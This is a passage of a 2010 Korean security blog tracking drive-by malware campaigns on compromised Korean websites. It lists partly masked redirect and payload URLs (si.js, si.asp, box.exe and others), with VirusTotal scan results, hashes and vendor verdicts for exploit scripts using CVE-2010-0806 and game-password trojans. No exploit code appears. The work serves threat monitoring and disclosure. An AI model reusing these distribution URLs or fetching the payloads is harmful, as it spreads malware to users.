다시 이런것을 출력 한다면 또다시 http://221.xxx.48.xxx/js/si.js 에 접근하게 됩니다. 이역시 위에 코드와 같이 꼬아놓았습니다. 그것을 다시 풀면 비로소 최종 파일에 연결되는 http://221.xxx.48.xxx/js/si.asp 에 접근이 됩니다. 그것을 토대로 최종파일 http://www.roxxxxxx.com/xxxx/help/box.exe 이쪽까지 연결되고 있습니다.
현재 js , asp , 최종파일을 살아있으며 사이트에 접근 하실때 감염이 되어있을수 있음을 알려드립니다 ...최종파일 box.exe 에 사용되었던 링크는 예전에도 많이 최종파일의 유포지였는데 조금 잠잠한가 싶더니만 또 다시 유포경로로 사용되고 있네요... time.asp 시절부터 줄 곧 최종파일로 들어가 있더니 오늘은 다른쪽에서 넣어져있네요..

마지막으로 어제와 달리 오늘은 주소, 최종파일 위치만 바뀌었을뿐 써먹은 기법은 비슷합니다. 

[안철수연구소 진단사항]

si.js ~> V3 : JS/Downloader(추가 : 2010.10.01.00)
si.asp ~> V3 : HTML/Exploit-cve(추가 : 2010.08.16.00)
최종파일 : box.exe ~> 악성 

[바이러스 토탈]

File name:

si.js

Result:

10/ 43 (23.3%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 JS/Downloader
AntiVir 7.10.12.96 2010.10.01 -
Antiy-AVL 2.0.3.7 2010.10.01 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.10.01 HTML:IFrame-JK
Avast5 5.0.594.0 2010.10.01 HTML:IFrame-JK
AVG 9.0.0.851 2010.10.01 -
BitDefender 7.2 2010.10.01 -
CAT-QuickHeal 11.00 2010.10.01 -
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6254 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 -
Emsisoft 5.0.0.50 2010.10.01 -
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7887 2010.10.01 -
F-Prot 4.6.2.117 2010.09.30 -
F-Secure 9.0.15370.0 2010.10.01 -
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 HTML:IFrame-JK
Ikarus T3.1.1.90.0 2010.10.01 -
Jiangmin 13.0.900 2010.09.30 -
K7AntiVirus 9.63.2648 2010.09.30 -
Kaspersky 7.0.0.125 2010.10.01 -
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.10.01 Heuristic.LooksLike.JS.Suspicious.B
Microsoft 1.6201 2010.10.01 -
NOD32 5495 2010.10.01 -
Norman 6.06.07 2010.10.01 -
nProtect 2010-10-01.02 2010.10.01 Script/W32.Agent.KE
Panda 10.0.2.7 2010.10.01 -
PCTools 7.0.3.5 2010.10.01 Downloader.Generic
Prevx 3.0 2010.10.01 -
Rising 22.67.02.07 2010.09.30 -
Sophos 4.58.0 2010.10.01 Mal/Iframe-Gen
Sunbelt 6954 2010.10.01 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.10.01 Downloader
TheHacker 6.7.0.1.041 2010.10.01 -
TrendMicro 9.120.0.1004 2010.10.01 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 -
VBA32 3.12.14.1 2010.10.01 -
ViRobot 2010.8.31.4017 2010.10.01 JS.S.Exploit.424
VirusBuster 12.66.9.0 2010.10.01 -
MD5: 82360d68e71cf37ae4400295f1746f08
SHA1: f67661ca29e253fde9bfda1ab5e0f54a0ddbf9dc
SHA256: 0536c42b0bbcbc8a4db28fe2f0931eee93bda5b1c8586682293e1a8664fc61de
File size: 424 bytes
Scan date: 2010-10-01 12:37:05 (UTC)

File name:

si.asp

Result:

19/ 43 (44.2%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 HTML/Exploit-cve
AntiVir 7.10.12.96 2010.10.01 JS/Agent.AV.2
Antiy-AVL 2.0.3.7 2010.10.01 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.10.01 JS:Downloader-RN
Avast5 5.0.594.0 2010.10.01 JS:Downloader-RN
AVG 9.0.0.851 2010.10.01 Script/Exploit
BitDefender 7.2 2010.10.01 -
CAT-QuickHeal 11.00 2010.10.01 -
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6254 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 Exploit.CVE2010.806
Emsisoft 5.0.0.50 2010.10.01 Exploit.JS.CVE-2010-0806!IK
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7887 2010.10.01 -
F-Prot 4.6.2.117 2010.09.30 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.10.01 -
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 JS:Downloader-RN
Ikarus T3.1.1.90.0 2010.10.01 Exploit.JS.CVE-2010-0806
Jiangmin 13.0.900 2010.09.30 -
K7AntiVirus 9.63.2648 2010.09.30 Riskware
Kaspersky 7.0.0.125 2010.10.01 Exploit.JS.CVE-2010-0806.z
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.10.01 Heuristic.BehavesLike.JS.BufferOverflow.A
Microsoft 1.6201 2010.10.01 -
NOD32 5495 2010.10.01 -
Norman 6.06.07 2010.10.01 -
nProtect 2010-10-01.02 2010.10.01 Script-JS/W32.Agent.ADF
Panda 10.0.2.7 2010.10.01 -
PCTools 7.0.3.5 2010.10.01 Trojan.Malscript
Prevx 3.0 2010.10.01 -
Rising 22.67.02.07 2010.09.30 Trojan.DL.Script.JS.Agent.qx
Sophos 4.58.0 2010.10.01 Mal/JSBO-Gen
Sunbelt 6954 2010.10.01 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.10.01 Trojan.Malscript!html
TheHacker 6.7.0.1.041 2010.10.01 -
TrendMicro 9.120.0.1004 2010.10.01 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 -
VBA32 3.12.14.1 2010.10.01 -
ViRobot 2010.8.31.4017 2010.10.01 JS.S.EX-CVE-2010-0806.6014
VirusBuster 12.66.9.0 2010.10.01 -
MD5: 8c3559a49e01ca01f37f30bb2becb843
SHA1: f5fe8f1f3879eadaefe1e5634caf1edd14c16394
SHA256: 6aa0644aac956e3c29c2de74ffcea74f560409a8eccc6ad5d5ee281631d18581
File size: 6014 bytes
Scan date: 2010-10-01 12:35:51 (UTC)

File name:

box.exe

Result:

16/ 43 (37.2%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 Trojan/Win32.OnlineGameHack
AntiVir 7.10.12.96 2010.10.01 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.10.01 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.10.01 -
Avast5 5.0.594.0 2010.10.01 -
AVG 9.0.0.851 2010.10.01 -
BitDefender 7.2 2010.10.01 Gen:Trojan.Heur.Zbot.dmW@cukxNad
CAT-QuickHeal 11.00 2010.10.01 (Suspicious) - DNAScan
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6254 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 -
Emsisoft 5.0.0.50 2010.10.01 Trojan.Win32.Pincav!IK
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7887 2010.10.01 -
F-Prot 4.6.2.117 2010.09.30 -
F-Secure 9.0.15370.0 2010.10.01 Gen:Trojan.Heur.Zbot.dmW@cukxNad
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 Gen:Trojan.Heur.Zbot.dmW@cukxNad
Ikarus T3.1.1.90.0 2010.10.01 Trojan.Win32.Pincav
Jiangmin 13.0.900 2010.09.30 Trojan/Invader.add
K7AntiVirus 9.63.2648 2010.09.30 -
Kaspersky 7.0.0.125 2010.10.01 -
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.10.01 -
Microsoft 1.6201 2010.10.01 -
NOD32 5495 2010.10.01 a variant of Win32/PSW.Gamania.NBT
Norman 6.06.07 2010.10.01 -
nProtect 2010-10-01.02 2010.10.01 -
Panda 10.0.2.7 2010.10.01 Suspicious file
PCTools 7.0.3.5 2010.10.01 -
Prevx 3.0 2010.10.01 High Risk Cloaked Malware
Rising 22.67.02.07 2010.09.30 -
Sophos 4.58.0 2010.10.01 Mal/Dorf-F
Sunbelt 6954 2010.10.01 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.10.01 -
TheHacker 6.7.0.1.041 2010.10.01 -
TrendMicro 9.120.0.1004 2010.10.01 TROJ_PINCAV.SMXA
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 TROJ_PINCAV.SMXA
VBA32 3.12.14.1 2010.10.01 Malware-Cryptor.Inject.gen
ViRobot 2010.8.31.4017 2010.10.01 -
VirusBuster 12.66.9.0 2010.10.01 -

MD5: 890f91924b1bd1ddc739c2a76cda20d7
SHA1: a11f4048cc73f38b3eed1f2f0f97161ba9d548dd
SHA256: e8f0b94fd3cb4d0772766c8a31021d505991d96fab11f17c2f73c53a21fd28d2
File size: 54272 bytes
Scan date: 2010-10-01 12:37:55 (UTC)

File name:

test.html

Result:

6/ 43 (14.0%)

Antivirus Version Last update Result
AhnLab-V3 2010.10.01.00 2010.09.30 -
AntiVir 7.10.12.96 2010.10.01 -
Antiy-AVL 2.0.3.7 2010.10.01 -
Authentium 5.2.0.5 2010.09.30 -
Avast 4.8.1351.0 2010.10.01 HTML:IFrame-JK
Avast5 5.0.594.0 2010.10.01 HTML:IFrame-JK
AVG 9.0.0.851 2010.10.01 -
BitDefender 7.2 2010.10.01 -
CAT-QuickHeal 11.00 2010.10.01 -
ClamAV 0.96.2.0-git 2010.10.01 -
Comodo 6254 2010.10.01 -
DrWeb 5.0.2.03300 2010.10.01 -
Emsisoft 5.0.0.50 2010.10.01 -
eSafe 7.0.17.0 2010.09.30 -
eTrust-Vet 36.1.7887 2010.10.01 -
F-Prot 4.6.2.117 2010.09.30 -
F-Secure 9.0.15370.0 2010.10.01 -
Fortinet 4.1.143.0 2010.09.30 -
GData 21 2010.10.01 HTML:IFrame-JK
Ikarus T3.1.1.90.0 2010.10.01 -
Jiangmin 13.0.900 2010.09.30 -
K7AntiVirus 9.63.2648 2010.09.30 -
Kaspersky 7.0.0.125 2010.10.01 -
McAfee 5.400.0.1158 2010.10.01 -
McAfee-GW-Edition 2010.1C 2010.10.01 Heuristic.LooksLike.JS.Suspicious.B
Microsoft 1.6201 2010.10.01 -
NOD32 5495 2010.10.01 -
Norman 6.06.07 2010.10.01 -
nProtect 2010-10-01.02 2010.10.01 -
Panda 10.0.2.7 2010.10.01 -
PCTools 7.0.3.5 2010.10.01 Downloader.Generic
Prevx 3.0 2010.10.01 -
Rising 22.67.02.07 2010.09.30 -
Sophos 4.58.0 2010.10.01 -
Sunbelt 6954 2010.10.01 -
SUPERAntiSpyware 4.40.0.1006 2010.10.01 -
Symantec 20101.2.0.161 2010.10.01 Downloader
TheHacker 6.7.0.1.041 2010.10.01 -
TrendMicro 9.120.0.1004 2010.10.01 -
TrendMicro-HouseCall 9.120.0.1004 2010.10.01 -
VBA32 3.12.14.1 2010.10.01 -
ViRobot 2010.8.31.4017 2010.10.01 -
VirusBuster 12.66.9.0 2010.10.01 -
MD5: cf3e589dd00e28a178ead8d8d8ebc5d2
SHA1: e690c7a6395058e7c3a785c470fce0ae2906e9a6
SHA256: 1328284a3d90a852b641ed1fe85ade7251837445b8acf2ae713f0cac224375d9
File size: 442 bytes
Scan date: 2010-10-01 12:45:33 (UTC)

참고로 test.html 은 js 출력시키는 방법을 전수해주신 쭌님에게 감사함을 전해 드립니다 ~

신고 예정 업체 : 네이버 , 이스트 소프트 , 잉카 인터넷 , 퓨쳐 시스템 !! 입니다 !!

끝까지 읽어주셔서 감사하고 앞으로도 많은 관심 부탁드립니다~

댓글을 달아 주세요

  1. 2010.10.02 08:28  Addr  Edit/Del  Reply

    비밀댓글입니다

  2. du hoc han quoc 2012.01.19 17:12  Addr  Edit/Del  Reply

    고마워요, 좋은 하루 소원

posted by Kwan's 2010. 7. 12. 12:58

1. 사이트 !!

큐x텔 : http://www.cxxxxtel.com/html

보안xx : http://www.bxxx.com

세x즌 : http://www.cxxxzen.com

한국 x xxx 협회 : http://www.x-xxxrts.or.kr

게xx임 : http://www.gaxxxxme.co.kr/main.asp

플xx 3x5 : http://fxxxx3x5.korea.com

메xx서울 : http://www.mxxxxseoul.co.kr

2. 유포지 !!

큐x텔 : http://1xx.4x.1x9.2xx/css/Lib.asp

보안xx : http://58xxx.com/js.js
            http://58xxx.com/ad.htm
            http://58xxx.com/top.jpg ~> 최종파일 다운 !!
            http://58xxx.com/cook.jpg
            http://58xxx.com/cook1.jpg
            http://58xxx.com/root.jpg

세x즌 : http://study.xxxx.or.kr/comm/hong/x.jpg
          http://study.xxxx.or.kr/comm/hong/a.jpg ~> 최종파일 다운 !!
          http://study.xxxx.or.kr/comm/hong/b.jpg
          http://study.xxxx.or.kr/comm/hong/c.jpg
          http://study.xxxx.or.kr/comm/hong/d.jpg
          http://study.xxxx.or.kr/comm/hong/i7.htm ~> 최종파일 다운 !!

한국 x xxx 협회 : http://1xx.4x.1x0.1xx/poll/k.asp

게xx임 : http://37xxx.com/0709.htm

플xx 3x5 : http://image.cixxxx.com/cixx21/xxxicle/2xxx/1231/K0000002_iel48406.html?컵켱 ~> 최종파일 다운 !!
              http://image.cixxxx.com/cixx21/xxxicle/2004/1231/K0000002_cul48407.html?耭쯩딩 ~> 최종파일 다운 !!

메xx서울 : http://ac.gexxxr.com/x/time.asp

3. 기타 사이트 !!

1. http://gft54577.xxxx.org:xx77/m/index.html ~>  http://gft54577.3xx2.org:6677/x/index.html 변조!!

2. http://cxx2.xxxx.org:88/xo/xi05.htm ~> http://cpm2.XX66.org:88/Xo/Xi05.htm : JS:CVE-2010-0806-AK

4. 최종파일 !!

Lip.asp , k.asp :  http://61.1X0.1.XX/css/isa.exe 

top.jpg : http://58XXX.com/tt.exe 

a.jpg , i7.htm : http://www.gXXXc.or.kr/html/gg.exe

0709.htm : http://XXXc1.com/0709.exe ~> XOR 변형 필요 !!

K0000002_iel48406.html?컵켱 : http://2X2.2XX.XX.243/db/update/update.exe ~> XOR 변형 필요 !!

timp.asp : http://www.roXXX1X4.com/cXXX/hXXp/box.exe

index.html : http://XXsifyanfka700.XXXX.org:6677/m/mtv.mdb

xi05.htm : http://XXX.ses99s.cn:XX/x5.exe

5. 바이러스 토탈 결과 !!

Lip.asp , k.asp : http://www.virustotal.com/ko/analisis/1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9-1278904755

ad.htm : http://www.virustotal.com/ko/analisis/6f4fc46e4dfd66395a4409854deca6226171a11cb6aae462339cab8574dcad75-1278904740

top.jpg : http://www.virustotal.com/ko/analisis/a8e7a5591fc7214c80975a9cfd174891e7b96611d4da26fde330301417528fc8-1278905008

cook.jpg : http://www.virustotal.com/ko/analisis/4f6408d2b48a2ba706c6cbe16c8c849c3d296d199f9eaf3a851cf819912b13f0-1278904996

cook1.jpg : http://www.virustotal.com/ko/analisis/13ce3060a82619b76c430af3251d2b138eea57e84737da8f824cc365526625b3-1278904999

root.jpg : http://www.virustotal.com/ko/analisis/25e775d8df15348f9ddb19ef609dc890f1e88ed12f04731cd4d8120371d66128-1278905144

a.jpg : http://www.virustotal.com/ko/analisis/a0a69a87e30528c203f8382fbbc751426c31e22ebadf66e9b93dab94e0f0b79d-1278905114

i7.htm : http://www.virustotal.com/ko/analisis/85488952cfa5042ab6a4b6f06802dfaae9ae2632ad0c485104133211f0645629-1278905148

0709.htm : http://www.virustotal.com/ko/analisis/f339328556c643365d11206bd198f19193db8ecee8cc22d6a647bd013a4f0595-1278905215

K0000002_iel48406.html : http://www.virustotal.com/ko/analisis/daff099b6b326c61521be93fa3727057fed1b080ce088ca3e7a24cbed27ef7a4-1278905223

xi05.htm : http://www.virustotal.com/ko/analisis/ed4989eda720d6fef0536965de85aa27498773f7c3f5827f13583c64e987c868-1278905452

isa.exe : http://www.virustotal.com/ko/analisis/4a683f1f89684278d25be8ed9531400755fc057cb69b07c9fcdca82b928abb29-1278905459

tt.exe : http://www.virustotal.com/ko/analisis/d1c6030f80ad761f316b999eac1b6eff801124f37b2ba352daf97bb752e051f9-1278905516

0709.exe : http://www.virustotal.com/ko/analisis/05d8b59bc57cf452cb5d6713d254876c3f2e147e47f27aa3bef472a1a91e82f6-1278905551

update.exe : http://www.virustotal.com/ko/analisis/9bb63dbcc20b0611760e47b0d10399a05f0c91cb9cfd0d8b99c5c59040b50283-1278905560

box.exe : http://www.virustotal.com/ko/analisis/6d71ea5053c11ebdb76591175c3eeb92209bf20afbe146305ddeb806f9061a18-1278905591

mtv.mdb : http://www.virustotal.com/ko/analisis/962febb5db8cc602bd11890c47ed1ec102996d0339a440ef1e97e7d797dd098f-1278905742

x5.exe : http://www.virustotal.com/ko/analisis/6932cc1719b7c871feda078417349b39514a680dabe8409ddf59f07bac2e135c-1278905747

샘플신고 : 이스트 소프트 , 안철수연구소

[이스트 소프트]

샘플 전송 완료 , 빠른 시일내에 업데이트 !!

[안철수연구소]

1. 0709.exe ~> 분석중
2. 0709.htm ~> 분석중
3. update.exe ~> 분석중
4. tt.exe ~> 악성
5. top.jpg ~> 악성
6. root.jpg ~> 악성
7. 3964750.js ~> 악성
8. a.jpg ~> 분석중
9. ad.htm ~> 악성
10. cc.jpg ~> 분석중
11. cook.jpg ~> 악성
12. cook1.jpg ~> 악성
13. gg.exe ~> 분석중
14. i7.htm ~> 분석중
15. isa.exe ~> 분석중
16. K0000002_iel48406.html ~> 분석중
17. x5.exe ~> V3 : Packed/Upack
18. box.exe ~> V3 : Win-Trojan/Magania.55296.N(추가 : 2010.07.09.05)
19. xi05.htm ~> V3 : HTML/Agent(추가 : 2010.07.09.00)
20. mtv.mdb ~> V3 : Win-Trojan/Downloader.43388(추가 : 2010.07.08.00)
21. k.asp ~> V3 : JS/Downloader(추가 : 2010.04.23.02)
 

이번주는 약간의 모니터한 보람이 있네요. 이제는 거의 제가 모아놓은 유포지 메모장이 있으니 대부분
쉽게 찾을수 있네요 !! 아직까지 그렇게 많이 찾은것은 아니지만 !! 나중에 군대가기전에 공유를 하고 가야겠어요!검색할필요도 없고 나름 저에게는 편한거 같네요!!그래도 많이 부족하니 많은 도움을 주세요!!!이번 한주도 즐겁고 편안하게 보내세요!!!

이번주 도와 주신분 : 없음 !!

[ 이전글 ]

[security/악성코드 유포] - 보안xx 현재 악성코드 유포중 !!
[security/악성코드 유포] - 휴대폰 통신사 큐x텔 악성 스크립트 삽입 !!
[security/악성코드 유포] - http://cpm2.XX66.org:88/Xo/Xi05.htm : JS:CVE-2010-0806-AK
[security/악성코드 유포] - http://gft54577.3xx2.org:6677/x/index.html 변조!!
[security/악성코드 유포] - TR/Bagle.trash (AntiVir) !!
[security/악성코드 유포] - http://cpm2.XX66.org:88/Xo/Xi05.htm : JS:CVE-2010-0806-AK

댓글을 달아 주세요

  1. Kwan's 2010.07.12 17:58 신고  Addr  Edit/Del  Reply

    1 x5.exe ~> V3 : Packed/Upack
    2 update.exexx ~> V3 : Win-Trojan/Onlinegamehack.55296.I(추가 : 2010.07.12.00)
    3 0709.exexx ~> V3 : Win-Trojan/Buzus.81920.DT(추가 : 2010.07.12.00)
    4 tt.exe ~> V3 : Win-Trojan/Onlinegamehack.81920.AZ(추가 : 2010.07.12.00)
    5 top.jpg ~> V3 : JS/Exploit(추가 : 2010.07.12.00)
    6 root.jpg ~> V3 : JS/Agent(추가 : 2010.07.12.00)
    7 K0000002_iel48406.html ~> V3 : JS/Exploit(추가 : 2010.07.12.00)
    8 isa.exe ~> V3 : Win-Trojan/Agent.55296.IE(추가 : 2010.07.12.00)
    9 gg.exe ~> V3 : Win-Trojan/Buzus.120320.Y(추가 : 2010.07.12.00)
    10 3964750.js ~> V3 : JS/Downloader(추가 : 2010.07.12.00)
    11 a.jpg ~> V3 : JS/Agent(추가 : 2010.07.12.00)
    12 ad.htm ~> V3 : JS/Exploit(추가 : 2010.07.12.00)
    13 cook.jpg ~> V3 : JS/Agent(추가 : 2010.07.12.00)
    14 cook1.jpg ~> V3 : JS/Agent(추가 : 2010.07.12.00)
    15 box.exe ~> V3 : Win-Trojan/Magania.55296.N(추가 : 2010.07.09.05)
    16 xi05.htm ~> V3 : HTML/Agent(추가 : 2010.07.09.00)
    17 mtv.mdb ~> V3 : Win-Trojan/Downloader.43388(추가 : 2010.07.08.00)
    18 k.asp ~> V3 : JS/Downloader(추가 : 2010.04.23.02)
    19 cc.jpg ~> 정상
    20 i7.htm ~> 정상
    21 0709.htm ~> 정상